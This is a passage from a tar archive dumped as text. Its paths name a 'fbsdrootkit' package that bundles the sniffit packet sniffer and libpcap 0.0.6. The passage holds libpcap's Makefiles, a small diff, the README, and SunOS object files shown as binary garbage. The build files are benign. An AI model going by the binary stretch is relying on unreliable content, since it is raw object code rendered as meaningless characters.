	     (cd .. ; $$tar - $$list) | compress > /tmp/$$name.tar.Z ; \
	    echo \
	    "rm -f ../$$name" ; \
	     rm -f ../$$name

# `force' has no recipe and depends on /tmp; presumably this keeps the
# targets that list it from ever being considered up to date.
force:	/tmp
# mkdep rewrites everything below the marker line at the end of this file.
depend:	$(GENSRC) force
	./mkdep -c $(CC) $(DEFINES) $(INCLUDES) $(SRC)
# DO NOT DELETE THIS LINE -- mkdep uses it.
# DO NOT PUT ANYTHING AFTER THIS LINE, IT WILL GO AWAY.
pcap-linux.o: pcap-linux.c /usr/include/sys/param.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/limits.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/syslimits.h \ /usr/include/limits.h /usr/include/features.h \ /usr/include/sys/cdefs.h /usr/include/posix1_lim.h \ /usr/include/linux/limits.h /usr/include/posix2_lim.h \ /usr/include/linux/param.h /usr/include/asm/param.h \ /usr/include/sys/types.h /usr/include/linux/types.h \ /usr/include/linux/posix_types.h /usr/include/asm/posix_types.h \ /usr/include/asm/types.h /usr/include/sys/bitypes.h \ /usr/include/stdio.h /usr/include/libio.h /usr/include/_G_config.h \ /usr/include/netdb.h /usr/include/paths.h /usr/include/ctype.h \ /usr/include/endian.h /usr/include/bytesex.h /usr/include/signal.h \ /usr/include/linux/signal.h /usr/include/asm/signal.h \ /usr/include/errno.h /usr/include/linux/errno.h \ /usr/include/asm/errno.h /usr/include/sys/time.h \ /usr/include/linux/time.h /usr/include/time.h \ /usr/include/sys/socket.h /usr/include/linux/socket.h \ /usr/include/asm/socket.h /usr/include/asm/sockios.h \ /usr/include/linux/sockios.h /usr/include/linux/uio.h \ /usr/include/sys/file.h /usr/include/fcntl.h /usr/include/gnu/types.h \ /usr/include/linux/fcntl.h /usr/include/asm/fcntl.h \ /usr/include/sys/ioctl.h /usr/include/linux/ioctl.h \ /usr/include/asm/ioctl.h /usr/include/termios.h \ /usr/include/linux/termios.h /usr/include/asm/termios.h \ /usr/include/asm/termbits.h /usr/include/asm/ioctls.h \ /usr/include/sys/socketio.h /usr/include/malloc.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/stddef.h \ /usr/include/memory.h /usr/include/string.h /usr/include/unistd.h \ /usr/include/posix_opt.h /usr/include/confname.h \ /usr/include/net/if.h /usr/include/linux/if.h \ /usr/include/net/if_arp.h /usr/include/linux/netdevice.h \ /usr/include/linux/config.h /usr/include/linux/autoconf.h \ /usr/include/linux/if_ether.h linux-include/linux/if_arp.h \ /usr/include/netinet/in.h /usr/include/linux/in.h \ /usr/include/asm/byteorder.h 
linux-include/netinet/in_systm.h \ linux-include/netinet/ip.h linux-include/netinet/ip_var.h \ linux-include/netinet/udp.h linux-include/netinet/tcp.h net/bpf.h \ pcap-int.h pcap.h pcap.o: pcap.c /usr/include/sys/types.h /usr/include/linux/types.h \ /usr/include/linux/posix_types.h /usr/include/asm/posix_types.h \ /usr/include/asm/types.h /usr/include/sys/bitypes.h \ /usr/include/unistd.h /usr/include/features.h \ /usr/include/sys/cdefs.h /usr/include/posix_opt.h \ /usr/include/gnu/types.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/stddef.h \ /usr/include/confname.h pcap-int.h pcap.h /usr/include/sys/time.h \ /usr/include/linux/time.h /usr/include/time.h net/bpf.h \ /usr/include/stdio.h /usr/include/libio.h /usr/include/_G_config.h inet.o: inet.c /usr/include/sys/param.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/limits.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/syslimits.h \ /usr/include/limits.h /usr/include/features.h \ /usr/include/sys/cdefs.h /usr/include/posix1_lim.h \ /usr/include/linux/limits.h /usr/include/posix2_lim.h \ /usr/include/linux/param.h /usr/include/asm/param.h \ /usr/include/sys/types.h /usr/include/linux/types.h \ /usr/include/linux/posix_types.h /usr/include/asm/posix_types.h \ /usr/include/asm/types.h /usr/include/sys/bitypes.h \ /usr/include/sys/file.h /usr/include/fcntl.h /usr/include/gnu/types.h \ /usr/include/linux/fcntl.h /usr/include/asm/fcntl.h \ /usr/include/sys/ioctl.h /usr/include/linux/ioctl.h \ /usr/include/asm/ioctl.h /usr/include/termios.h \ /usr/include/linux/termios.h /usr/include/asm/termios.h \ /usr/include/asm/termbits.h /usr/include/asm/ioctls.h \ /usr/include/sys/socketio.h /usr/include/linux/sockios.h \ /usr/include/asm/sockios.h /usr/include/sys/socket.h \ /usr/include/linux/socket.h /usr/include/asm/socket.h \ /usr/include/linux/uio.h /usr/include/net/if.h \ /usr/include/linux/if.h /usr/include/netinet/in.h \ /usr/include/linux/in.h /usr/include/asm/byteorder.h \ /usr/include/ctype.h /usr/include/endian.h 
/usr/include/bytesex.h \ /usr/include/errno.h /usr/include/linux/errno.h \ /usr/include/asm/errno.h /usr/include/stdio.h /usr/include/libio.h \ /usr/include/_G_config.h /usr/include/stdlib.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/stddef.h \ /usr/include/alloca.h /usr/include/string.h /usr/include/unistd.h \ /usr/include/posix_opt.h /usr/include/confname.h pcap.h \ /usr/include/sys/time.h /usr/include/linux/time.h /usr/include/time.h \ net/bpf.h gencode.o: gencode.c /usr/include/sys/types.h \ /usr/include/linux/types.h /usr/include/linux/posix_types.h \ /usr/include/asm/posix_types.h /usr/include/asm/types.h \ /usr/include/sys/bitypes.h /usr/include/sys/socket.h \ /usr/include/features.h /usr/include/sys/cdefs.h \ /usr/include/linux/socket.h /usr/include/asm/socket.h \ /usr/include/asm/sockios.h /usr/include/linux/sockios.h \ /usr/include/linux/uio.h /usr/include/sys/time.h \ /usr/include/linux/time.h /usr/include/time.h /usr/include/net/if.h \ /usr/include/linux/if.h net/bpf.h /usr/include/netinet/in.h \ /usr/include/linux/in.h /usr/include/asm/byteorder.h \ linux-include/netinet/if_ether.h /usr/include/net/if_arp.h \ /usr/include/linux/netdevice.h /usr/include/linux/config.h \ /usr/include/linux/autoconf.h /usr/include/linux/if_ether.h \ linux-include/linux/if_arp.h /usr/include/memory.h \ /usr/include/string.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/stddef.h pcap.h \ /usr/include/stdio.h /usr/include/libio.h /usr/include/_G_config.h \ pcap-namedb.h /usr/include/setjmp.h /usr/include/jmp_buf.h \ /usr/include/i386/jmp_buf.h /usr/include/signal.h \ /usr/include/linux/signal.h /usr/include/asm/signal.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/stdarg.h \ /usr/include/stdlib.h /usr/include/errno.h /usr/include/linux/errno.h \ /usr/include/asm/errno.h /usr/include/alloca.h gencode.h optimize.o: optimize.c /usr/include/sys/types.h \ /usr/include/linux/types.h /usr/include/linux/posix_types.h \ /usr/include/asm/posix_types.h /usr/include/asm/types.h \ 
/usr/include/sys/bitypes.h /usr/include/sys/time.h \ /usr/include/features.h /usr/include/sys/cdefs.h \ /usr/include/linux/time.h /usr/include/time.h net/bpf.h \ /usr/include/stdio.h /usr/include/libio.h /usr/include/_G_config.h \ /usr/include/memory.h /usr/include/string.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/stddef.h gencode.h nametoaddr.o: nametoaddr.c /usr/include/sys/param.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/limits.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/syslimits.h \ /usr/include/limits.h /usr/include/features.h \ /usr/include/sys/cdefs.h /usr/include/posix1_lim.h \ /usr/include/linux/limits.h /usr/include/posix2_lim.h \ /usr/include/linux/param.h /usr/include/asm/param.h \ /usr/include/sys/types.h /usr/include/linux/types.h \ /usr/include/linux/posix_types.h /usr/include/asm/posix_types.h \ /usr/include/asm/types.h /usr/include/sys/bitypes.h \ /usr/include/sys/socket.h /usr/include/linux/socket.h \ /usr/include/asm/socket.h /usr/include/asm/sockios.h \ /usr/include/linux/sockios.h /usr/include/linux/uio.h \ /usr/include/net/if.h /usr/include/linux/if.h \ /usr/include/netinet/in.h /usr/include/linux/in.h \ /usr/include/asm/byteorder.h linux-include/netinet/if_ether.h \ /usr/include/net/if_arp.h /usr/include/linux/netdevice.h \ /usr/include/linux/config.h /usr/include/linux/autoconf.h \ /usr/include/linux/if_ether.h linux-include/linux/if_arp.h \ /usr/include/arpa/inet.h /usr/include/ctype.h /usr/include/endian.h \ /usr/include/bytesex.h /usr/include/errno.h \ /usr/include/linux/errno.h /usr/include/asm/errno.h \ /usr/include/netdb.h /usr/include/paths.h pcap.h \ /usr/include/sys/time.h /usr/include/linux/time.h /usr/include/time.h \ net/bpf.h /usr/include/stdio.h /usr/include/libio.h \ /usr/include/_G_config.h pcap-namedb.h gencode.h ethertype.h etherent.o: etherent.c /usr/include/sys/types.h \ /usr/include/linux/types.h /usr/include/linux/posix_types.h \ /usr/include/asm/posix_types.h /usr/include/asm/types.h \ 
/usr/include/sys/bitypes.h /usr/include/ctype.h \ /usr/include/features.h /usr/include/sys/cdefs.h \ /usr/include/endian.h /usr/include/bytesex.h pcap.h \ /usr/include/sys/time.h /usr/include/linux/time.h /usr/include/time.h \ net/bpf.h /usr/include/stdio.h /usr/include/libio.h \ /usr/include/_G_config.h pcap-namedb.h savefile.o: savefile.c /usr/include/sys/types.h \ /usr/include/linux/types.h /usr/include/linux/posix_types.h \ /usr/include/asm/posix_types.h /usr/include/asm/types.h \ /usr/include/sys/bitypes.h /usr/include/sys/time.h \ /usr/include/features.h /usr/include/sys/cdefs.h \ /usr/include/linux/time.h /usr/include/time.h net/bpf.h \ /usr/include/errno.h /usr/include/linux/errno.h \ /usr/include/asm/errno.h /usr/include/memory.h /usr/include/string.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/stddef.h \ /usr/include/stdio.h /usr/include/libio.h /usr/include/_G_config.h \ /usr/include/stdlib.h /usr/include/alloca.h /usr/include/unistd.h \ /usr/include/posix_opt.h /usr/include/gnu/types.h \ /usr/include/confname.h pcap-int.h pcap.h bpf_filter.o: bpf_filter.c /usr/include/sys/param.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/limits.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/syslimits.h \ /usr/include/limits.h /usr/include/features.h \ /usr/include/sys/cdefs.h /usr/include/posix1_lim.h \ /usr/include/linux/limits.h /usr/include/posix2_lim.h \ /usr/include/linux/param.h /usr/include/asm/param.h \ /usr/include/sys/types.h /usr/include/linux/types.h \ /usr/include/linux/posix_types.h /usr/include/asm/posix_types.h \ /usr/include/asm/types.h /usr/include/sys/bitypes.h \ /usr/include/sys/time.h /usr/include/linux/time.h /usr/include/time.h \ net/bpf.h bpf_image.o: bpf_image.c /usr/include/sys/types.h \ /usr/include/linux/types.h /usr/include/linux/posix_types.h \ /usr/include/asm/posix_types.h /usr/include/asm/types.h \ /usr/include/sys/bitypes.h /usr/include/sys/time.h \ /usr/include/features.h /usr/include/sys/cdefs.h \ /usr/include/linux/time.h 
/usr/include/time.h net/bpf.h pcap.h \ /usr/include/stdio.h /usr/include/libio.h /usr/include/_G_config.h \ /usr/include/string.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/stddef.h scanner.o: scanner.c /usr/include/stdio.h /usr/include/features.h \ /usr/include/sys/cdefs.h /usr/include/libio.h \ /usr/include/_G_config.h /usr/include/sys/types.h \ /usr/include/linux/types.h /usr/include/linux/posix_types.h \ /usr/include/asm/posix_types.h /usr/include/asm/types.h \ /usr/include/sys/bitypes.h /usr/include/sys/time.h \ /usr/include/linux/time.h /usr/include/time.h /usr/include/ctype.h \ /usr/include/endian.h /usr/include/bytesex.h pcap.h net/bpf.h \ pcap-namedb.h gencode.h tokdefs.h /usr/include/stdlib.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/stddef.h \ /usr/include/errno.h /usr/include/linux/errno.h \ /usr/include/asm/errno.h /usr/include/alloca.h grammar.o: grammar.c /usr/include/sys/types.h \ /usr/include/linux/types.h /usr/include/linux/posix_types.h \ /usr/include/asm/posix_types.h /usr/include/asm/types.h \ /usr/include/sys/bitypes.h /usr/include/sys/time.h \ /usr/include/features.h /usr/include/sys/cdefs.h \ /usr/include/linux/time.h /usr/include/time.h \ /usr/include/sys/socket.h /usr/include/linux/socket.h \ /usr/include/asm/socket.h /usr/include/asm/sockios.h \ /usr/include/linux/sockios.h /usr/include/linux/uio.h \ /usr/include/net/if.h /usr/include/linux/if.h net/bpf.h \ /usr/include/netinet/in.h /usr/include/linux/in.h \ /usr/include/asm/byteorder.h linux-include/netinet/if_ether.h \ /usr/include/net/if_arp.h /usr/include/linux/netdevice.h \ /usr/include/linux/config.h /usr/include/linux/autoconf.h \ /usr/include/linux/if_ether.h linux-include/linux/if_arp.h \ /usr/include/stdio.h /usr/include/libio.h /usr/include/_G_config.h \ pcap.h pcap-namedb.h gencode.h # IF YOU PUT ANYTHING HERE IT WILL GO AWAY fbsdrootkit-1.2/sniffit.0.3.3/libpcap/Makefile.in100600 764 764 14714 6226213210 16735 0ustar dfdf# Copyright (c) 1993, 1994, 1995 # The Regents of 
the University of California. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that: (1) source code distributions # retain the above copyright notice and this paragraph in its entirety, (2) # distributions including binary code include the above copyright notice and # this paragraph in its entirety in the documentation or other materials # provided with the distribution, and (3) all advertising materials mentioning # features or use of this software display the following acknowledgement: # ``This product includes software developed by the University of California, # Lawrence Berkeley Laboratory and its contributors.'' Neither the name of # the University nor the names of its contributors may be used to endorse # or promote products derived from this software without specific prior # written permission. # THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED # WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. # # @(#) $Header: Makefile.in,v 1.37+ 94/06/25 14:53:47 leres Exp $ (LBL) # # Various configurable paths # # where the installed pcap files go INCL_DIR = /usr/local/include # where libpcap.a should go LIB_DIR = /usr/local/lib # where man page should go MAN_DIR = /usr/local/man # # Owner of installed files # BIN_GRP = bin BIN_OWN = bin # # You shouldn't need to edit anything below. # #have-ethers#ETHERS_DEFINES = -DETHER_SERVICE #have-sunos5#OS_DEFINES = -DSOLARIS DEFINE_STDC = -D__STDC__ #have-gcc#DEFINE_STDC = #have-irix4#OS_DEFINES = -Dvolatile= $(DEFINE_STDC) #have-irix5#OS_DEFINES = -Dvolatile= $(DEFINE_STDC) #have-pf#PCAP_DEFINES = -DPCAP_PF #have-bpf#PCAP = bpf #have-dlpi#PCAP = dlpi #have-nit#PCAP = nit #have-pf#PCAP = pf #have-snit#PCAP = snit #have-snoop#PCAP = snoop #have-linux#PCAP = linux CCOPT = -O INCLUDES = -I. #have-linux#INCLUDES = -I. 
-Ilinux-include DEFINES = -DFDDI $(ETHERS_DEFINES) $(PCAP_DEFINES) $(OS_DEFINES) # Standard CFLAGS CFLAGS = $(CCOPT) $(DEFINES) $(INCLUDES) # Standard C compiler CC = cc GCC_FLAGS = -Wmissing-prototypes -Wstrict-prototypes #have-gcc1#GCC_FLAGS = #have-gcc#CC = gcc -g -Wall $(GCC_FLAGS) # # Flex and bison allow you to specify the prefixes of the global symbols # used by the generated parser. This allows programs to use lex/yacc # and link against libpcap. If you don't have flex or bison, get them. # LEX = lex YACC = yacc #have-flex#LEX = flex -Ppcap_ #have-bison#YACC = bison -y -p pcap_ MAKE = make SHELL = /bin/sh RANLIB = true #have-ranlib#RANLIB = ranlib # Explicitly define compiliation rule since SunOS 4's make doesn't like gcc. # Also, gcc does not remove the .o before forking 'as', which can be a # problem if you don't own the file but can write to the directory. .c.o: rm -f $@; $(CC) $(CFLAGS) -c $*.c PCAPSRC = \ pcap-$(PCAP).c CSRC = pcap.c inet.c gencode.c optimize.c nametoaddr.c etherent.c savefile.c \ bpf_filter.c bpf_image.c LSRC = scanner.l YSRC = grammar.y GENSRC = \ $(LSRC:.l=.c) $(YSRC:.y=.c) SRC = $(PCAPSRC) $(CSRC) $(GENSRC) ALLSRC = \ pcap-bpf.c pcap-dlpi.c pcap-enet.c pcap-nit.c pcap-pf.c \ pcap-snit.c pcap-snoop.c \ $(CSRC) checkioctl.c $(LSRC) $(YSRC) OBJ = $(SRC:.c=.o) # Some makes can't handle the above substitution #have-broken-make#OBJ = pcap-$(PCAP).o \ #have-broken-make# pcap.o inet.o gencode.o optimize.o nametoaddr.o \ #have-broken-make# etherent.o savefile.o bpf_filter.o bpf_image.o \ #have-broken-make# scanner.o grammar.o HDR = pcap.h pcap-int.h pcap-namedb.h pcap-nit.h pcap-pf.h \ ethertype.h gencode.h GENHDR = \ tokdefs.h TAGFILES = \ $(SRC) $(HDR) TARFILES = \ README CHANGES INSTALL VERSION Makefile.in pcap.3 mkdep \ $(ALLSRC) $(HDR) \ net bpf/net/bpf_filter.c bpf/net/bpf.h SUNOS4 configure CLEANFILES = \ $(OBJ) libpcap.a checkioctl lex.yy.c $(GENSRC) $(GENHDR) libpcap.a: $(OBJ) rm -f libpcap.a ar rc $@ $(OBJ) $(RANLIB) $@ 
checkioctl: checkioctl.c rm -f $@; $(CC) $(CFLAGS) $@.c -o $@ scanner.c: scanner.l rm -f $@; $(LEX) -t $< > $$$$.$@; mv $$$$.$@ $@ scanner.o: scanner.c tokdefs.h rm -f $@; $(CC) $(CFLAGS) $(LEX_DEFINES) -c $*.c tokdefs.h: grammar.c grammar.c: grammar.y rm -f grammar.c tokdefs.h $(YACC) -d $< mv y.tab.c grammar.c mv y.tab.h tokdefs.h grammar.o: grammar.c $(CC) -c $(CFLAGS) -Dyylval=pcap_lval grammar.c install: force @for i in $(INCL_DIR) $(LIB_DIR) ; do \ if [ ! -d $$i ] ; then \ echo "mkdir $$i"; \ mkdir $$i; \ chmod 755 $$i; \ chown $(BIN_OWN) $$i; \ chgrp $(BIN_GRP) $$i; \ else \ true; \ fi; \ done cp libpcap.a $(LIB_DIR); \ chmod 444 $(LIB_DIR)/libpcap.a; \ chown $(BIN_OWN) $(LIB_DIR)/libpcap.a; \ chgrp $(BIN_GRP) $(LIB_DIR)/libpcap.a -$(RANLIB) $(LIB_DIR)/libpcap.a cp pcap.h pcap-namedb.h $(INCL_DIR); \ chmod 444 $(INCL_DIR)/pcap.h $(INCL_DIR)/pcap-namedb.h; \ chown $(BIN_OWN) $(INCL_DIR)/pcap.h $(INCL_DIR)/pcap-namedb.h; \ chgrp $(BIN_GRP) $(INCL_DIR)/pcap.h $(INCL_DIR)/pcap-namedb.h @if [ ! -f /usr/include/net/bpf.h ]; then \ i=$(INCL_DIR)/net; \ if [ ! -d $$i ] ; then \ echo "mkdir $$i"; \ mkdir $$i; \ chmod 755 $$i; \ chown $(BIN_OWN) $$i; \ chgrp $(BIN_GRP) $$i; \ else \ true; \ fi; \ set -x; \ cp net/bpf.h $(INCL_DIR)/net; \ chmod 444 $(INCL_DIR)/net/bpf.h; \ chown $(BIN_OWN) $(INCL_DIR)/net/bpf.h; \ chgrp $(BIN_GRP) $(INCL_DIR)/net/bpf.h; \ fi install-man: force @i=$(MAN_DIR)/man3; \ if [ ! 
-d $$i ] ; then \ echo "mkdir $$i"; \ mkdir $$i; \ chmod 755 $$i; \ chown $(BIN_OWN) $$i; \ chgrp $(BIN_GRP) $$i; \ else \ true; \ fi; \ cp pcap.3 $(MAN_DIR)/man3 chmod 444 $(MAN_DIR)/man3/pcap.3 chown $(BIN_OWN) $(MAN_DIR)/man3/pcap.3 chgrp $(BIN_GRP) $(MAN_DIR)/man3/pcap.3 clean: rm -f $(CLEANFILES) realclean: rm -f $(CLEANFILES) Makefile tags tags: $(TAGFILES) ctags -wtd $(TAGFILES) tar: force @cwd=`pwd` ; dir=`basename $$cwd` ; name=libpcap-`cat VERSION` ; \ list="" ; tar="tar cFFf" ; \ for i in $(TARFILES) ; do list="$$list $$name/$$i" ; done; \ echo \ "rm -f ../$$name; ln -s $$dir ../$$name" ; \ rm -f ../$$name; ln -s $$dir ../$$name ; \ echo \ "(cd .. ; $$tar - [lots of files]) | compress > /tmp/$$name.tar.Z" ; \ (cd .. ; $$tar - $$list) | compress > /tmp/$$name.tar.Z ; \ echo \ "rm -f ../$$name" ; \ rm -f ../$$name force: /tmp depend: $(GENSRC) force ./mkdep -c $(CC) $(DEFINES) $(INCLUDES) $(SRC) fbsdrootkit-1.2/sniffit.0.3.3/libpcap/Makefile.in.diff100600 764 764 565 6226213210 17603 0ustar dfdf*** ../libpcap-0.0.6~/Makefile.in Tue Apr 25 06:36:32 1995 --- Makefile.in Sat Sep 30 01:13:11 1995 *************** *** 56,62 **** --- 56,64 ---- #have-snit#PCAP = snit #have-snoop#PCAP = snoop + #have-linux#PCAP = linux CCOPT = -O INCLUDES = -I. + #have-linux#INCLUDES = -I. -Ilinux-include DEFINES = -DFDDI $(ETHERS_DEFINES) $(PCAP_DEFINES) $(OS_DEFINES) fbsdrootkit-1.2/sniffit.0.3.3/libpcap/README100600 764 764 5557 6226213210 15535 0ustar dfdf@(#) $Header: README,v 1.7+ 94/06/20 18:56:55 leres Exp $ (LBL) LIBPCAP 0.0.6 Lawrence Berkeley Laboratory Network Research Group libpcap@ee.lbl.gov ftp://ftp.ee.lbl.gov/libpcap-*.tar.Z This directory contains source code for libpcap, a system-independent interface for user-level packet capture. libpcap provides a portable framework for low-level network monitoring. Applications include network statistics collection, security monitoring, network debugging, etc. 
Since almost every system vendor provides a different interface for packet capture, and since we've developed several tools that require these interfaces, we've created this system-independent API to ease porting and to alleviate the need for several system-dependent packet capture modules in each application.

THIS IS AN ALPHA-QUALITY RELEASE. The interface is brand new and is likely to change. If you code to this interface, and want to track future versions, be prepared to update your code. We admit that this release is premature, but we're releasing it anyway because the tcpdump-3.0 distribution requires it.

libpcap has been built and tested under SGI Irix 4.x & 5.2, SunOS 4.x, Solaris 2.3, BSD/386 v1.1, DEC/OSF v1.3 and v2.0, and Ultrix 4.x. SunOS 3.5, 4.3BSD Reno/Tahoe and 4.4BSD are supported as well, but we currently do not have the resources to carry out testing in these environments (we suspect you'll run into problems under these systems -- please send us the patches if you fix any porting problems).

The libpcap interface supports a filtering mechanism based on the architecture in the BSD packet filter. BPF is described in the 1993 Winter Usenix paper ``The BSD Packet Filter: A New Architecture for User-level Packet Capture''. A compressed postscript version is in ftp://ftp.ee.lbl.gov/papers/bpf-usenix93.ps.Z.

Although most packet capture interfaces support in-kernel filtering, libpcap utilizes in-kernel filtering only for the BPF interface. On systems that don't have BPF, all packets are read into user-space and the BPF filters are evaluated in the libpcap library, incurring added overhead (especially for selective filters). We haven't tried taking advantage of other packet filter models, first because they aren't general enough (i.e., only simple filters can be evaluated), and second because we don't have the time to modify the code generator (or write a filter translator) and BPF is more efficient anyway.
BPF is standard in 4.4BSD, BSD/386, NetBSD, and FreeBSD. DEC OSF/1 uses the packetfilter interface but has been extended to accept BPF filters (which libpcap utilizes). Also, you can add BPF filter support to Ultrix using the kernel source and/or object patches available in ftp://gatekeeper.dec.com/pub/DEC/net/bpfext42.tar.Z. Please send bugs and comments to libpcap@ee.lbl.gov. - Steve McCanne (mccanne@ee.lbl.gov) Craig Leres (leres@ee.lbl.gov) Van Jacobson (van@ee.lbl.gov) fbsdrootkit-1.2/sniffit.0.3.3/libpcap/SUNOS4/ 40700 764 764 0 6226213210 15535 5ustar dfdffbsdrootkit-1.2/sniffit.0.3.3/libpcap/SUNOS4/nit_if.o.sun4c.4.0.3c100600 764 764 12253 6226213210 21146 0ustar dfdf ðÄL`ã¿ ³.`€¦à€³>`²`ú@¶ €"€ €¦áÔ`€¦À &€ €¦á²ú@¶à€2¿ÿùÔ`€¦á2€"’ – ¶?ÿ€SÖ(4Ѐ"€€N¶?ÿ¶`ÿ²àú@€"€’ à`€¦À&€’ â`€¦À4€²¤ ¶?ÿ€<ä(4Ðú@€2¿ÿóà`’ @ ¸€2€è ¦ ¶?ÿ€-æ(4Ð’ ¨ è' ú  ø'`ì@ì'@ú&@ð'`ú& ú& 8À'`À'`ö'`À'`@À'` ²€€î`´ ô-à ú` . 0Ð7@’c€Ò7`  ”¢àÔ7` Ö`’–àÖ&` Â@Â@ŸÀ@Ð Çà‘èã¿  $@’ ö úà Ðà€Š "€ €"€’ @¸`ú€"€ €€§@"€€¸ú€2¿ÿû€§@€2€ÔÀ@ ÔÀÔ'À& @ÐàÇà‘è ã¿ Ò`Ò ` € €H€¢`€!€¢`€€¢`†€BÐ` Ð €Š "€ Ú` ’ @ú` Ö@– àý– àÿÖ/@Ú` Ú @€‹`€0’@€.’@-€)ú` Ð`¶`€€!ä ä   €€ê@€€@¸€2€îà @€”î6à Ð ’Ð Â 0ŸÀ@@€@Çà‘è ã¿ ú ö`  øÀ’`€§ €0’a €§ 2€½ Ð` €2€¹ Ò`” ‚Ô*` – 9Ö&à’@€ÎÔ`Ô  Â`4ŸÀ@’Ð&àÞà€"€ä`à`¢ ‚€»â, ¦ æ,  ¨ €¶è&à Ð`’ @Ð ¸€2€ø'` î` ‚Ð-à ’ €¨Ò&àÔ`– Ö*  €£À&à ô`¸ ô  ô€€Ž "€è`àà€"€â`€ ¸ €Œ`2€€Ð` @’ ¸€"€î`ä`¦ ‚æ,  €‡ø&à€ "€ î`Ð` @’ €"€î`ê`¬ ‚ì-` €yÐ&à´ ® ÿðî'`Ô`𠔀Ô'`Ø`Ú+ €nÀ&à Þ`¨ Þà ú`ª º`ú#Àæ`è,à €cê&à ì`ì  ì€ì'`Ò`€ "€ Ø`Ô`€¢ :€Ø`– Ö'`Ø`š Ú+ À&à ’ @ ¶€"€K’Þ`€"€º%Üú`€§`d4€€§a€¸ 4€¸ ¸ âठä,` ôà ¦ 0æ6€’@‘/`Ð6  ‘/`@’Ð6  èਠè&à@’€(’ì`” ì  ú`– ú%€Ò`Ô*` €Ö&à ’`€§ ¿ÿx ’`€§ ¿ÿ´ ’`€§ ¿ÿ]0’`€§ ¿ÿ¡0’`€§ ¿ÿä0’a €§ "¿ÿ=ú` Ø`š ‚Ú+ ’@² Çà‘èã¿ ø €"€€Ò €¢@2€øÔ  € €Ö €Šà"€ ø@Ð €2€ €Ø ˜ Ø' ø€2¿ÿëÒ €€¬è ’”@©¬€2€€Þ žà€ŸÞ' ?ÿÜ#ÿÿ¦€™¤€"€—º ú€"€€Ò` €¢@2€ú@Ô  € €Ö`€Šà"€ ú@@Ð`€2€ €Ø`˜ Ø'`ú@€2¿ÿëÒ` €"€Ô Þ`€£À2€ Ô`@ª€2€Ô à`  € à'`’@iª€2€è`Ð` Ð'`Ô €Š "€PÂ Ö ¶ €Šà"€Ø ¶ Ø €‹ "€Ú ¶àÚ €‹`"€’ ¶à’ @¶€2€âà@Þ žà€:Þ'  Ð,` Ò €Š`"€Ø îà–àØÀÖàØ%àÖ%àÞÀÐàž ÀŸ3à Ð%àÔà” Ô&àØ €‹ "€ â îàÚ Ú%ÀÞàžàÞ&àâ 
€Œ`"€ ’îàРҠ Ð%ÀÖà–àÖ&à’@¬Â ’Â` Â@Â@Ð ŸÀ@Ð ¸€¿ÿk¬º Çà‘èã¿ ú €"€ø ´& €§@(€ø ºø ’ ¸@¸ ¹7 ¹/ @´€2€ê €´ À-` ì ì ¬%€ì& ì&  ÐÒ @Ô ð Ô €”€€ Ô& Ö ”’ @Ø ˜Ø& Çà‘èã¿ @Çà‘è 㿘€¸¿ü€À'¿üÖ Ò Ô –"À  ’@˜ º€2€ ú'Ô¿ü€ €@пü@€° 𠸀2¿ÿçÖ ð¿üÇàè@(#) $Header: nit_if.c,v 1.4 90/03/20 18:18:19 leres Exp $ sun4c (LBL)@(#)nit_if.c 1.24++ 88/02/09 Copyr 1987 Sun Micro껀.àsnitsnit_close nonexistent instance ˆ ‹| ˆŒ ‹ä†ÿÿÿL†ÿÿþ´È&†ÿÿþ8ä ˆð ˆø†ÿÿþ ˆ ‹D ÍH%†ÿÿý¸L Í\†ÿÿý¤´&†ÿÿýLä7†ÿÿý\†ÿÿü¤Œ†ÿÿütœ6†ÿÿüd7†ÿÿûøp+†ÿÿûø†ÿÿû4†ÿÿú̆ÿÿúh:†ÿÿù˜x:†ÿÿùˆ”7†ÿÿùl<7†ÿÿøÄT ˆX ‹˜ †ÿÿøhh †ÿÿ÷˜´#†ÿÿ÷L X†ÿÿö¨ p6†ÿÿö ¤ˆ ¨‹ <†ÿÿõÄ Ä†ÿÿõ< †ÿÿôü 0†ÿÿôÐ P†ÿÿô° „ L ˆ L †ÿÿôp ¸ †ÿÿôH À6†ÿÿô@€ È”˜À  l¨l¼ lÄ |È ˜ À" „.¬: lF ˜R |^hqzƒŒ€•Ÿ@©°¶¿ÆÐ×Ýãíõül #.6=AI `\ck ðr L…@‘›£®· ÀË ´ÖPáåíõù  8&+_phz_hostnamelen_snit_close_snit_cpmsg_snit_ioctl_snit_minfo_snit_winit_snit_rinit_boottime_mclfree_m_freem_mclgetx_nisoftc_pidhash_freeproc_hostname_bcopy_proc_whichqs_freeb_m_cpytoc_ifnet_time_tick_rawintrq_allocb_linkb_lbolt_snit_put_domainnamelen_mfree_ifpromisc_canput_nproc_hz_dupmsg_cp_mblks_to_mbufs_panic_flushq_rcsid_free_mbuffed_mblk_domainname_zombproc_ifunit_procNPROC_allproc_avenrun_snit_open_snit_info_snit_intr_qs_m_want_mbstat_tz_freemsg_qreply_etherbroadcastaddr_sccsid.mulfbsdrootkit-1.2/sniffit.0.3.3/libpcap/SUNOS4/nit_if.o.sparc100600 764 764 12134 6226213210 20414 0ustar dfdf ð¸¸X`ã¿ ³.`€¦à€³>`²`ú@¶ €"€ €¦áÔ`€¦À &€ €¦á²ú@¶à€2¿ÿùÔ`€¦á2€0’ – 